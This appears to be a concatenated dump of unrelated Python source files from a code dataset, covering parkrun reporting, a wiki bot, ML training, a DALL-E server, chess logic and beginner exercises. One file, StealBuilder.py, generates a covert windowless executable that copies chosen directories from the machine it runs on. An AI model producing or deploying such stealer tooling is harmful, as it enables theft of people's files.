self.parkrun_week = week\n event_number = str(self.parkrun_event_number) \n links.append('tag: ' + self.parkrun_name + '_parkrun_' + event_number)\n links.append('tag: ' + self.parkrun_name)\n links.append('tag: parkrun')\n links.append('https://www.flickr.com/groups_pool_add.gne?path=' + self.parkrun_name + '-parkrun')\n links.append('https://www.flickr.com/groups/' + self.parkrun_name + '-parkrun/')\n links.append('http://www.parkrun.com.au/'\n + self.parkrun_name + '/results/weeklyresults/?runSeqNumber='\n + event_number)\n \n if week == 2 or week == 3:\n for i in range(1, number_event_urls):\n event_number = str(self.parkrun_event_number - i)\n links.append('http://www.parkrun.com.au/'\n + self.parkrun_name + '/results/weeklyresults/?runSeqNumber='\n + event_number)\n \n # display as html (works correctly in browser, but not in pycharm notebook view)\n template = self.template_env.get_template(\"links.html\")\n return template.render({'links': links})\n\n def create_week(self, week=False, options=False):\n self.sections = []\n self.toc = []\n\n self.add_summary_section()\n # self.add_upcoming_section()\n self.add_volunteer_section()\n self.add_milestone_section()\n \n # allow override of week and options since week and options in class init are only used for link creation.\n if week is not False:\n self.parkrun_week = week\n \n # merge options\n if options is not False:\n self.options = {**self.options, **options}\n \n if self.parkrun_week == 1:\n self.add_age_group_section()\n elif self.parkrun_week == 2:\n self.add_regular_section(self.options['runner_limit'], self.options['volunteer_limit'])\n elif self.parkrun_week == 3:\n self.add_week_pb_section(self.options['pb_limit'])\n elif self.parkrun_week == 4:\n self.add_community_section()\n \n self.add_times_section()\n self.add_photo_section()\n\n args = {'sections': self.sections, 'toc': self.toc}\n template = self.template_env.get_template(self.options['template_name'] + \".html\")\n \n return template.render(args)\n\n def add_summary_section(self):\n text = self.results_system_text\n # find string position of third last .\n needle = '.'\n pos = RunReportUtils.reverse_find(text, needle, 3)\n\n section = {\n 'heading': 'Summary',\n 'anchor': 'summary',\n 'content': {\n 'start': '',\n 'list': [\n text[text.find(self.RESULT_SYSTEM_START_TEXT):text.find('.') + 1],\n text[pos + 1:].strip()\n ],\n 'end': self.content_text['summary'],\n },\n 'separator': True\n }\n\n self.sections.append(section)\n self.toc.append({'heading': section['heading'], 'anchor': section['anchor']})\n \n def add_upcoming_section(self):\n # Only add section if there is upcoming text\n content = self.content_text['upcoming']\n if content == '':\n return\n section = {\n 'heading': 'Upcoming',\n 'anchor': 'upcoming',\n 'content': self.content_text['upcoming'],\n 'separator': True\n }\n self.sections.append(section)\n self.toc.append({'heading': section['heading'], 'anchor': section['anchor']})\n\n def add_milestone_section(self):\n # Only add if there are any milestones\n photo_links = self.get_photo_links('milestone')\n if len(photo_links) == 0:\n return\n\n section = {\n 'heading': 'Milestones',\n 'anchor': 'milestone',\n 'photos': photo_links,\n }\n self.sections.append(section)\n self.toc.append({'heading': section['heading'], 'anchor': section['anchor']})\n \n def add_volunteer_section(self):\n section = {\n 'heading': 'Volunteers',\n 'anchor': 'volunteers',\n 'content': {\n 'start': self.content_text['volunteer'],\n 'list': self.current_event_volunteers,\n },\n 
'separator': True,\n 'photos': self.get_photo_links('volunteer')\n }\n self.sections.append(section)\n self.toc.append({'heading': section['heading'], 'anchor': section['anchor']})\n \n def add_age_group_section(self):\n section = {\n 'heading': 'Age Group First Finishers',\n 'anchor': 'age_group',\n 'summary_data': self.get_age_group_finisher_summary()\n }\n self.sections.append(section)\n self.toc.append({'heading': section['heading'], 'anchor': section['anchor']})\n \n def add_regular_section(self, runner_limit=7, volunteer_limit=2):\n section = {\n 'heading': 'Regular Runners / Volunteers',\n 'anchor': 'regular',\n 'summary_data': self.get_regular_summary(runner_limit, volunteer_limit)\n }\n self.sections.append(section)\n self.toc.append({'heading': section['heading'], 'anchor': section['anchor']})\n \n def add_week_pb_section(self, pb_limit=2):\n section = {\n 'heading': 'Regular PBs',\n 'anchor': 'pbs',\n 'summary_data': self.get_pb_summary(pb_limit)\n }\n self.sections.append(section)\n self.toc.append({'heading': section['heading'], 'anchor': section['anchor']})\n \n def add_community_section(self):\n # TODO work out what to do here\n content = ''\n section = {\n 'heading': 'Having Fun',\n 'anchor': 'fun',\n 'content': content\n }\n self.sections.append(section)\n self.toc.append({'heading': section['heading'], 'anchor': section['anchor']})\n \n def add_times_section(self):\n section = {\n 'heading': 'Aesthetically pleasing times',\n 'anchor': 'times',\n 'content': {\n 'list': self.get_aesthetic_times(),\n },\n 'separator': True\n }\n self.sections.append(section)\n self.toc.append({'heading': section['heading'], 'anchor': section['anchor']})\n \n def add_photo_section(self):\n section = {\n 'heading': 'Photos',\n 'anchor': 'photos',\n 'photos': self.get_photo_links('photo')\n }\n self.sections.append(section)\n self.toc.append({'heading': section['heading'], 'anchor': section['anchor']})\n","sub_path":"src/run_report.py","file_name":"run_report.py","file_ext":"py","file_size_in_byte":20942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"259971784","text":"from vpython import *\nprint('oi')\n\nscene = canvas(width = 600, height = 600, center = vector(0,5,0))\nSun = sphere(pos=vector(0,0,0), radius = 100, color = color.orange)\nearth = sphere(pos = vector(-200,0,0), radius = 10, color = color.blue, make_trail=True, trail_type='points', interval=10, retain=50)\nearthv = vector(0,5,0)\nfor i in range(0,10000):\n rate(100)\n earth.pos += earthv\n \n","sub_path":"comp-cientifica-II-2019-2/Project-II/Teste/visualtest.py","file_name":"visualtest.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"328587530","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nUser assisted updating redirect links on disambiguation pages.\n\nUsage:\n python disambredir.py [start]\n\nIf no starting name is provided, the bot starts at '!'.\n\n\"\"\"\n#\n# (C) André Engels, 2006-2009\n# (C) Pywikibot team, 2006-2014\n#\n# Distributed under the terms of the MIT license.\n#\nfrom __future__ import unicode_literals\n\n__version__ = '$Id$'\n#\nimport pywikibot\n\nfrom pywikibot import i18n, textlib, pagegenerators\nfrom pywikibot.bot import MultipleSitesBot, CurrentPageBot, InteractiveReplace\n\nmsg = {\n 'ar': u'تغيير التحويلات في صفحة توضيح',\n 'be-x-old': u'Замена перанакіраваньняў на старонку неадназначнасьцяў',\n 'en': u'Changing redirects on a 
disambiguation page',\n 'he': u'משנה קישורים להפניות בדף פירושונים',\n 'fa': u'اصلاح تغییرمسیرها در یک صفحه ابهام‌زدایی',\n 'ja': u'ロボットによる: 曖昧さ回避ページのリダイレクト修正',\n 'nl': u'Verandering van redirects op een doorverwijspagina',\n 'pl': u'Zmiana przekierowań na stronie ujednoznaczającej',\n 'pt': u'Arrumando redirects na página de desambiguação',\n 'ru': u'Изменение перенаправлений на странице неоднозначности',\n 'uk': u'Зміна перенаправлень на сторінці багатозначності',\n 'zh': u'機器人: 修改消歧義頁中的重定向連結',\n}\n\n\nclass DisambiguationRedirectBot(MultipleSitesBot, CurrentPageBot):\n\n \"\"\"Change redirects from disambiguation pages.\"\"\"\n\n def _create_callback(self, old, new):\n replace_callback = InteractiveReplace(\n old, new, default='n', automatic_quit=False, yes_shortcut=True)\n replace_callback.allow_replace_label = True\n return replace_callback\n\n def treat_page(self):\n \"\"\"Iterate over the linked pages and replace redirects conditionally.\"\"\"\n text = self.current_page.text\n for linked_page in self.current_page.linkedPages():\n try:\n target = linked_page.getRedirectTarget()\n except (pywikibot.Error, pywikibot.SectionError):\n continue\n # TODO: Work on all links at the same time (would mean that the user\n # doesn't get them ordered like in links but how they appear in the page)\n text = textlib.replace_links(\n text, self._create_callback(linked_page, target),\n self.current_page.site)\n\n if text != self.current_page.get():\n summary = i18n.translate(self.current_page.site, msg, fallback=True)\n self.put_current(text, summary=summary)\n\n\ndef main(*args):\n \"\"\"\n Process command line arguments and invoke bot.\n\n If args is an empty list, sys.argv is used.\n\n @param args: command line arguments\n @type args: list of unicode\n \"\"\"\n local_args = pywikibot.handle_args(args)\n\n start = local_args[0] if local_args else '!'\n\n mysite = pywikibot.Site()\n try:\n mysite.disambcategory()\n except pywikibot.Error as e:\n pywikibot.output(e)\n pywikibot.showHelp()\n return\n\n generator = pagegenerators.CategorizedPageGenerator(\n mysite.disambcategory(), start=start, content=True, namespaces=[0])\n\n bot = DisambiguationRedirectBot(generator=generator)\n bot.run()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/disambredir.py","file_name":"disambredir.py","file_ext":"py","file_size_in_byte":3511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"182898490","text":"import os\nfrom os import getcwd\nfrom shutil import rmtree\n\n\ntargets = []\ncounter = 1\n\nprint(\"\"\"\n+----------------+\n| STEALBUILDER |\n| PixHead [1.0] |\n+----------------+\"\"\")\nprint(\"\\nEnter 'exit' to finish\")\n\nwhile True:\n\n\tdir = input(\"[%s]Directory: \" % counter)\n\n\tif dir != \"exit\":\n\t\ttargets.append(dir)\n\t\tcounter += 1\n\telse:\n\t\tbreak\n\nprint(\"=================\")\nname = input(\"Name for stealer: \")\nfullname = name + '.py' \nprint(\"\")\n\nwith open(fullname, \"w\") as f:\n\tf.write(\"\"\"\nfrom os import getcwd, mkdir\nfrom os.path import basename\nfrom shutil import copytree\n\ndirectory = getcwd() + '/Result/'\ntry:\n\tmkdir(directory)\nexcept:\n\tpass\n\ntargetlist = \"\"\" + str(targets) + \"\"\" \n\nfor target in targetlist:\n\tunder = directory + basename(target)\n\ttry:\n\t\tcopytree(target, under)\n\texcept:\n\t\tpass\n\"\"\")\n\n\nos.system(\"pyinstaller -w -F \" + getcwd() + \"/\" + fullname)\n\ntry:\n\trmtree(\"build\")\n\trmtree(\"__pycache__\")\n\tos.remove(fullname)\n\tos.remove(name 
+ \".spec\")\n\tprint(\"\\nEXE file saved to ./dist\")\nexcept:\n\tprint(\"Something went wrong!\")\n\n","sub_path":"StealBuilder.py","file_name":"StealBuilder.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"573412205","text":"import os\nimport nltk\nstemmer = nltk.stem.lancaster.LancasterStemmer()\nimport tensorflow as tf\nimport random\nimport json\nimport shutil\nimport utils\nimport numpy as np\n#nltk.download('punkt')\n\ndef train():\n #Collect all unique occurring words in database\n words = []\n for association in utils.associations:\n for pattern in association['patterns']:\n words_current = utils.sentence_tokenize(pattern)\n for word in words_current:\n if not word in words:\n words.append(word)\n\n #Prepare training set\n #Add empty training set to prevent classification of not recognized sentence\n labels = []\n training = [[\n [0] * len(words),\n [0] * len(utils.associations)\n ]]\n labels.append([0] * len(utils.associations))\n\n for associationID in range(len(utils.associations)):\n association = utils.associations[associationID]\n for pattern in association['patterns']:\n #Prepare label\n label = [0] * len(utils.associations)\n label[associationID] = 1\n labels.append(label)\n\n #Prepare input vector\n sentence_tokenized = utils.sentence_tokenize(pattern)\n for tokenID in range(1, len(sentence_tokenized)+1):\n vector = utils.sentence_tokenized_to_vector(sentence_tokenized[0:tokenID], words)\n training.append([\n vector,\n label\n ])\n\n #training = sorted(training, key=lambda x: (len(x[0]) - x[0].count(0)))\n\n #Shuffle all words vectors and its labels\n random.shuffle(training)\n training = np.array(training)\n train_x = list(training[:,0])\n train_y = list(training[:,1])\n\n #Debug\n '''\n print(len(training_input), len(training_input[0]), \"train_x\", training_input)\n print('')\n print(len(labels), len(labels[0]), \"train_y\", labels)\n exit()\n '''\n\n tf.reset_default_graph()\n model = utils.set_model(len(words), len(utils.associations))\n\n #Remove old logs if exists\n if os.path.isdir('build_logs'):\n shutil.rmtree('build_logs')\n\n #Start training\n model.fit(\n train_x,\n train_y,\n n_epoch=utils.config['fit']['n_epoch'],\n batch_size=utils.config['fit']['batch_size'],\n show_metric=True)\n\n #Save trained network\n if os.path.isdir('model'):\n shutil.rmtree('model')\n model.save('model/model.tflearn')\n\n #Add words and labels to model as json file for classification\n with open('model/train_data.json', 'w') as file:\n train_data = {\n 'words': words,\n 'labels': labels\n }\n file.write(json.dumps(train_data))\n\nif __name__ == \"__main__\":\n train()\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"262235026","text":"\"\"\"\nDefinitions of each of the different chess pieces.\n\"\"\"\n\nfrom abc import ABC, abstractmethod\n\nfrom chessington.engine.data import Player, Square\n\n\nclass Piece(ABC):\n \"\"\"\n An abstract base class from which all pieces inherit.\n \"\"\"\n\n def __init__(self, player):\n self.player = player\n self.has_moved = False\n\n @abstractmethod\n def get_available_moves(self, board):\n \"\"\"\n Get all squares that the piece is allowed to move to.\n \"\"\"\n pass\n\n def move_to(self, board, new_square):\n \"\"\"\n Move this piece to the given square on the board.\n \"\"\"\n current_square = 
board.find_piece(self)\n board.move_piece(current_square, new_square)\n\n def position(self, board):\n return board.find_piece(self)\n\n def direction(self):\n return {Player.WHITE: 1, Player.BLACK: -1}[self.player]\n\n def steps(self, board, move, limit):\n if limit:\n move_limit = 1\n elif not limit:\n move_limit = 7\n current_square = self.position(board)\n moves = []\n step = {'forward_step': [1, 0], 'backward_step': [-1, 0], 'left_step': [0, -1], 'right_step': [0, 1], \\\n 'forward_left_diagonal': [1, -1], 'forward_right_diagonal': [1, 1], 'backward_left_diagonal': [-1, -1], \\\n 'backward_right_diagonal': [-1, 1]}\n xy = step[move]\n for i in range(1, move_limit + 1):\n next_square = Square.at(current_square.row + (self.direction() * i * xy[0]),\n current_square.col + (self.direction() * i * xy[1]))\n if board.in_board(next_square):\n if board.square_is_empty(next_square):\n moves.append(next_square)\n elif board.has_enemy(next_square):\n moves.append(next_square)\n break\n elif board.has_friend(next_square):\n break\n return moves\n\n\nclass Pawn(Piece):\n \"\"\"\n A class representing a chess pawn.\n \"\"\"\n\n def get_available_moves(self, board):\n moves = []\n forward_step = self.steps(board, 'forward_step', limit=True)[0]\n if not board.has_enemy(forward_step):\n moves.append(forward_step)\n current_square = self.position(board)\n start_row = {Player.WHITE: 1, Player.BLACK: 6}[self.player]\n if current_square.row == start_row:\n double_step = Square.at(current_square.row + (2 * self.direction()), current_square.col)\n if board.square_is_empty(double_step):\n moves.append(double_step)\n moves += self.attackable_squares(board, current_square)\n return moves\n\n def attackable_squares(self, board, current_square):\n left_diagonal = Square.at(current_square.row + self.direction(), current_square.col - 1)\n left_en_passant = Square.at(current_square.row, current_square.col - 1)\n right_diagonal = Square.at(current_square.row + self.direction(), current_square.col + 1)\n right_en_passant = Square.at(current_square.row, current_square.col + 1)\n attack_moves = []\n if board.has_enemy(left_diagonal) or board.en_passant == left_en_passant:\n attack_moves.append(left_diagonal)\n if board.has_enemy(right_diagonal) or board.en_passant == right_en_passant:\n attack_moves.append(right_diagonal)\n return attack_moves\n\n\nclass Knight(Piece):\n \"\"\"\n A class representing a chess knight.\n \"\"\"\n\n def get_available_moves(self, board):\n current_square = self.position(board)\n moves = [\n Square.at(current_square.row + 2, current_square.col - 1),\n Square.at(current_square.row + 2, current_square.col + 1),\n Square.at(current_square.row - 2, current_square.col - 1),\n Square.at(current_square.row - 2, current_square.col + 1),\n Square.at(current_square.row + 1, current_square.col - 2),\n Square.at(current_square.row - 1, current_square.col - 2),\n Square.at(current_square.row + 1, current_square.col + 2),\n Square.at(current_square.row - 1, current_square.col + 2)\n ]\n valid_moves = []\n for move in moves:\n if board.in_board(move):\n valid_moves.append(move)\n return valid_moves\n\n\nclass Bishop(Piece):\n \"\"\"\n A class representing a chess bishop.\n \"\"\"\n\n def get_available_moves(self, board):\n moves = self.steps(board, 'forward_left_diagonal', limit=False) + self.steps(board, 'forward_right_diagonal',\n limit=False) \\\n + self.steps(board, 'backward_left_diagonal', limit=False) + self.steps(board,\n 'backward_right_diagonal',\n limit=False)\n return moves\n\n\nclass 
Rook(Piece):\n \"\"\"\n A class representing a chess rook.\n \"\"\"\n\n def get_available_moves(self, board):\n moves = self.steps(board, 'forward_step', limit=False) + self.steps(board, 'backward_step', limit=False) \\\n + self.steps(board, 'left_step', limit=False) + self.steps(board, 'right_step', limit=False)\n return moves\n\n def castling(self, board, castling):\n current_square = self.position(board)\n if castling == 'left':\n if self.has_moved == False:\n board.move_piece(current_square, Square.at(current_square.row, current_square.col + 2))\n elif castling == 'right':\n if self.has_moved == False:\n board.move_piece(current_square, Square.at(current_square.row, current_square.col - 2))\n\n\nclass Queen(Piece):\n \"\"\"\n A class representing a chess queen.\n \"\"\"\n\n def get_available_moves(self, board):\n moves = self.steps(board, 'forward_step', limit=False) + self.steps(board, 'backward_step', limit=False) \\\n + self.steps(board, 'left_step', limit=False) + self.steps(board, 'right_step', limit=False) \\\n + self.steps(board, 'forward_left_diagonal', limit=False) + self.steps(board, 'forward_right_diagonal',\n limit=False) \\\n + self.steps(board, 'backward_left_diagonal', limit=False) + self.steps(board,\n 'backward_right_diagonal',\n limit=False)\n return moves\n\n\nclass King(Piece):\n \"\"\"\n A class representing a chess king.\n \"\"\"\n\n def get_available_moves(self, board):\n moves = self.steps(board, 'forward_step', limit=True) + self.steps(board, 'backward_step', limit=True) \\\n + self.steps(board, 'left_step', limit=True) + self.steps(board, 'right_step', limit=True) \\\n + self.steps(board, 'forward_left_diagonal', limit=True) + self.steps(board, 'forward_right_diagonal',\n limit=True) \\\n + self.steps(board, 'backward_left_diagonal', limit=True) + self.steps(board, 'backward_right_diagonal',\n limit=True)\n if self.has_moved == False:\n current_square = self.position(board)\n left_squares = [Square.at(current_square.row, current_square.col - 3),\n Square.at(current_square.row, current_square.col - 2), \\\n Square.at(current_square.row, current_square.col - 1),\n Square.at(current_square.row, current_square.col + 1), \\\n Square.at(current_square.row, current_square.col + 2)]\n right_squares = [Square.at(current_square.row, current_square.col + 1),\n Square.at(current_square.row, current_square.col + 2)]\n empty = True\n for square in left_squares:\n if not board.square_is_empty(square):\n empty = False\n if empty:\n moves.append(Square.at(current_square.row, current_square.col - 2))\n empty = True\n for square in right_squares:\n if not board.square_is_empty(square):\n empty = False\n if empty:\n moves.append(Square.at(current_square.row, current_square.col + 2))\n\n return moves\n","sub_path":"chessington/engine/pieces.py","file_name":"pieces.py","file_ext":"py","file_size_in_byte":8739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"521358771","text":"import io\nimport os, sys\nimport requests\nimport PIL\nimport numpy as np\n\nimport torch\nimport torch.nn.functional as F\nimport torchvision.transforms as T\nimport torchvision.transforms.functional as TF\n\nfrom dall_e import map_pixels, unmap_pixels, load_model\n\ndef download_image(url):\n resp = requests.get(url)\n resp.raise_for_status()\n return PIL.Image.open(io.BytesIO(resp.content))\n\ndef preprocess(img, target_size):\n s = min(img.size)\n\n if s < target_size:\n raise ValueError(f'min dim for image {s} < {target_size}')\n\n r = target_size / 
s\n s = (round(r * img.size[1]), round(r * img.size[0]))\n # img = TF.resize(img, s, interpolation=PIL.Image.LANCZOS)\n img = TF.resize(img, s, interpolation=TF.InterpolationMode.LANCZOS)\n img = TF.center_crop(img, output_size=2 * [target_size])\n img = torch.unsqueeze(T.ToTensor()(img), 0)\n return map_pixels(img)\n\ndev = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\nprint(\"Loading models...\")\nenc = load_model(\"./dall-e/encoder.pkl\", dev)\ndec = load_model(\"./dall-e/decoder.pkl\", dev)\n\nfrom flask import Flask, request, send_file, send_from_directory, jsonify\nimport json \nfrom waitress import serve\n\napp = Flask('app')\n\n# Uncomment these two lines to enable CORS headers for all routes:\n# from flask_cors import CORS\n# CORS(app) \n\ndef serve_pil_image(pil_img):\n img_io = io.BytesIO()\n pil_img.save(img_io, 'JPEG', quality=70)\n img_io.seek(0)\n return send_file(img_io, mimetype='image/jpeg')\n\n@app.route('/', methods=[\"GET\"])\ndef home():\n return send_from_directory(\".\", \"index.html\")\n\n@app.route('/encode-decode/', methods=[\"POST\"])\ndef encode_decode(size):\n with torch.no_grad(): # https://github.com/pytorch/pytorch/issues/16417#issuecomment-566654504\n data = request.files['file']\n x = preprocess(PIL.Image.open(data), int(size))\n z_logits = enc(x.to(dev))\n z = torch.argmax(z_logits, axis=1)\n z = F.one_hot(z, num_classes=enc.vocab_size).permute(0, 3, 1, 2).float()\n x_stats = dec(z).float()\n x_rec = unmap_pixels(torch.sigmoid(x_stats[:, :3]))\n x_rec = T.ToPILImage(mode='RGB')(x_rec[0])\n return serve_pil_image(x_rec)\n\n@app.route('/encode/', methods=[\"POST\"])\ndef encode(size):\n data = request.files['file']\n x = preprocess(PIL.Image.open(data), int(size))\n z_logits = enc(x.to(dev))\n z = torch.argmax(z_logits, axis=1)\n return jsonify(z.cpu().numpy().tolist())\n\n@app.route('/decode', methods=[\"POST\"])\ndef decode():\n z = request.get_json(force=True)\n z = np.array(z)\n z = torch.from_numpy(z).to(dev)\n z = F.one_hot(z, num_classes=enc.vocab_size).permute(0, 3, 1, 2).float()\n x_stats = dec(z).float()\n x_rec = unmap_pixels(torch.sigmoid(x_stats[:, :3]))\n x_rec = T.ToPILImage(mode='RGB')(x_rec[0])\n return serve_pil_image(x_rec)\n\nprint(\"Server started.\")\nserve(app, host=\"0.0.0.0\", port=8080)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"320913755","text":"'''\nCreated on Jul 26, 2014\n\n@author: ANBU\n'''\n\nclass Employee:\n empCount = 0\n empList = []\n\n def __init__(self, eid, name):\n print(\"Employee Object Initiated\")\n self.eid = eid\n self.name = name\n Employee.empCount += 10\n \n \n def addEmployee(self, employee):\n Employee.empList.append(employee)\n \n def displayAll(self):\n for empdet in Employee.empList:\n print(empdet.eid)\n print(empdet.name)\n def __del__(self):\n print(\"Employee Object Destroyed\")\n\nif __name__ == '__main__':\n \n emp = Employee(1, \"Kalaiarasan\")\n print(Employee.empCount)\n pass\n","sub_path":"PythonWorkspace/FirstPgm/org/srm/kalai/ClassObjectsSample.py","file_name":"ClassObjectsSample.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"131891213","text":"import tensorflow as tf\nimport numpy as np\nimport math\n\nclass Position_Encoder(object):\n def __init__(self, emb_size, max_len=5000):\n self.emb_size = emb_size\n 
self.max_len = max_len\n pe = np.zeros([max_len, emb_size], np.float32)\n position = np.expand_dims(np.arange(0, max_len), 1).astype(np.float32)\n div_term = np.exp(np.arange(0 ,emb_size, 2).astype(np.float32) * -(math.log(10000.0) / emb_size))\n pe[:, 0::2] = np.sin(position * div_term)\n pe[:, 1::2] = np.cos(position * div_term)\n pe = np.expand_dims(pe, 1)\n self.pe = tf.Variable(pe, trainable=False)\n\n def __call__(self, inputs, seq_length):\n with tf.variable_scope('position_encoder'):\n embs = tf.transpose(inputs, [1, 0, 2])\n max_time = tf.shape(embs)[0]\n batch_size = tf.shape(embs)[1]\n embs = embs * tf.sqrt(float(self.emb_size))\n embs_ta = tf.TensorArray(dtype=tf.float32, size=max_time)\n embs_ta = embs_ta.unstack(embs)\n output_ta = tf.TensorArray(dtype=tf.float32, dynamic_size=True, size=0)\n t0 = tf.constant(0, dtype=tf.int32)\n f0 = tf.zeros([batch_size], dtype=tf.bool)\n mask = tf.expand_dims(tf.cast(tf.sequence_mask(seq_length), tf.float32), -1)\n def loop_fn(t, output_ta, f):\n cur_emb = embs_ta.read(t)\n output = tf.concat([cur_emb, tf.tile(self.pe[t], [batch_size, 1])], -1)\n output_ta = output_ta.write(t, output)\n f = tf.greater_equal(t + 1, seq_length)\n return t + 1, output_ta, f\n\n _, output_ta, _ = tf.while_loop(\n cond=lambda _1, _2, f: tf.logical_not(tf.reduce_all(f)),\n body=loop_fn,\n loop_vars=(t0, output_ta, f0)\n )\n embs = tf.transpose(output_ta.stack(), [1, 0, 2])\n embs *= mask\n return embs\n\n\nclass Cnn_extractor(object):\n def __init__(self, hidden_dim):\n self.hidden_dim = hidden_dim\n self.sw0 = tf.layers.Conv1D(self.hidden_dim, 1, padding='same')\n self.bn0 = tf.layers.BatchNormalization()\n self.sw1 = tf.layers.Conv1D(self.hidden_dim, 1, padding='same')\n self.bn1 = tf.layers.BatchNormalization()\n self.sw2 = tf.layers.Conv1D(self.hidden_dim, 2, padding='same')\n self.bn2 = tf.layers.BatchNormalization()\n self.sw2_2 = tf.layers.Conv1D(self.hidden_dim, 2, padding='same')\n self.bn2_2 = tf.layers.BatchNormalization()\n self.sw3 = tf.layers.Conv1D(self.hidden_dim, 3, padding='same')\n self.bn3 = tf.layers.BatchNormalization()\n self.sw3_2 = tf.layers.Conv1D(self.hidden_dim, 3, padding='same')\n self.bn3_2 = tf.layers.BatchNormalization()\n self.sw3_3 = tf.layers.Conv1D(self.hidden_dim, 3, padding='same')\n self.bn3_3 = tf.layers.BatchNormalization()\n\n def __call__(self, input):\n with tf.variable_scope('cnn_extractor'):\n input = self.sw0(input)\n input = tf.nn.selu(input)\n input = self.bn0(input)\n sw1 = self.sw1(input)\n sw1 = tf.nn.selu(sw1)\n sw1 = self.bn1(sw1)\n sw2 = self.sw2(input)\n sw2 = tf.nn.selu(sw2)\n sw2 = self.bn2(sw2)\n sw2 = self.sw2_2(sw2)\n sw2 = tf.nn.selu(sw2)\n sw2 = self.bn2_2(sw2)\n sw3 = self.sw3(input)\n sw3 = tf.nn.selu(sw3)\n sw3 = self.bn3(sw3)\n sw3 = self.sw3_2(sw3)\n sw3 = tf.nn.selu(sw3)\n sw3 = self.bn3_2(sw3)\n sw3 = self.sw3_3(sw3)\n sw3 = tf.nn.selu(sw3)\n sw3 = self.bn3_3(sw3)\n \n cnn_output = tf.concat([sw1, sw2, sw3], -1)\n cnn_output = tf.layers.dense(cnn_output, self.hidden_dim, activation=tf.nn.selu)\n return tf.nn.dropout(cnn_output, keep_prob=0.5)\n\n\nclass Attention(object):\n def __init__(self, hidden_dim, num_tags):\n super(Attention, self).__init__()\n self.hidden_dim = hidden_dim\n self.num_tags = num_tags\n\n self.attn_dense = tf.layers.Dense(self.hidden_dim, use_bias=False,\n kernel_initializer=tf.contrib.layers.xavier_initializer())\n self.attn_linear = tf.layers.Dense(self.hidden_dim, use_bias=True, activation=tf.nn.tanh,\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\n 
bias_initializer=tf.zeros_initializer())\n self.__init_embs()\n\n def __init_embs(self):\n with tf.variable_scope('tag_embedding'):\n self._tag_embeddings = tf.get_variable(name='_tag_embeddings', shape=[self.num_tags, 25], dtype=tf.float32)\n\n\n def __call__(self, input, sequence_lengths):\n with tf.variable_scope('attention'):\n tag_embeddings = tf.nn.embedding_lookup(params=self._tag_embeddings,\n ids=tf.constant(list(range(self.num_tags)), dtype=tf.int32),\n name='tag_embeddings')\n query = tf.transpose(input, [1, 0, 2])\n max_time = tf.shape(query)[0]\n batch_size = tf.shape(query)[1]\n context = tf.tile(tf.expand_dims(tag_embeddings, 0),\n [batch_size, 1, 1])\n query_ta = tf.TensorArray(dtype=tf.float32, size=max_time)\n query_ta = query_ta.unstack(query)\n attn_ta = tf.TensorArray(dtype=tf.float32, dynamic_size=True, size=0)\n output_ta = tf.TensorArray(dtype=tf.float32, dynamic_size=True, size=0)\n t0 = tf.constant(0, dtype=tf.int32)\n f0 = tf.zeros([batch_size], dtype=tf.bool)\n\n def loop_fn(t, attn_ta, output_ta, f):\n cur_q = query_ta.read(t)\n gamma_h = self.attn_dense(context)\n gamma_h = tf.squeeze(tf.matmul(gamma_h, tf.expand_dims(cur_q, -1)), -1)\n weights = tf.nn.softmax(gamma_h, -1)\n c_t = tf.squeeze(tf.matmul(tf.expand_dims(weights, 1), context), 1)\n output = self.attn_linear(tf.concat([c_t, cur_q], -1))\n attn_ta = attn_ta.write(t, gamma_h)\n output_ta = output_ta.write(t, output)\n f = tf.greater_equal(t + 1, sequence_lengths)\n return t + 1, attn_ta, output_ta, f\n\n _, attn_ta, output_ta, _ = tf.while_loop(\n cond=lambda _1, _2, _3, f: tf.logical_not(tf.reduce_all(f)),\n body=loop_fn,\n loop_vars=(t0, attn_ta, output_ta, f0)\n )\n self.attn_cnn_outputs = tf.transpose(output_ta.stack(), [1, 0, 2])\n attn_weights = tf.transpose(attn_ta.stack(), [1, 0, 2])\n return attn_weights, self.attn_cnn_outputs\n","sub_path":"model/NCRFSAC/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":6917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"488855083","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jun 3 14:40:43 2018\r\n\r\n@author: lenovo\r\n\"\"\"\r\n\r\na,b=3,True\r\nprint(b)\r\nscore=80\r\ntwo=100\r\nif score>80 and two==100:\r\n print(\"phone\")\r\nelse:\r\n print(\"no pay\")\r\n \r\n \r\nif 1>2:\r\n print(\"1\")\r\nelif 2>3:\r\n print(\"2\")\r\nelse:\r\n print(\"3\")\r\n \r\n \r\n#0-60:不及格;60-70:及格;70-90:良;90-100:优秀\r\nfenshu=99\r\nif fenshu>=90:\r\n print(\"优秀\")\r\nelif fenshu>=70:\r\n print(\"良好\")\r\nelif fenshu>=60:\r\n print(\"及格\")\r\nelse:\r\n print(\"不及格\")\r\n\r\n#while+break=if\r\nwhile 1>0:\r\n print(\"1\")\r\n break\r\n\r\n\r\nls=['当山峰没有棱角的时候','当河水不再流','当时间停住日夜不分','当天地万物化为虚有']\r\nfor i in ls:\r\n print(i)\r\n \r\n\r\nfor i in range(1,10):\r\n print(i)\r\nfor i in range(20,10,-3):\r\n 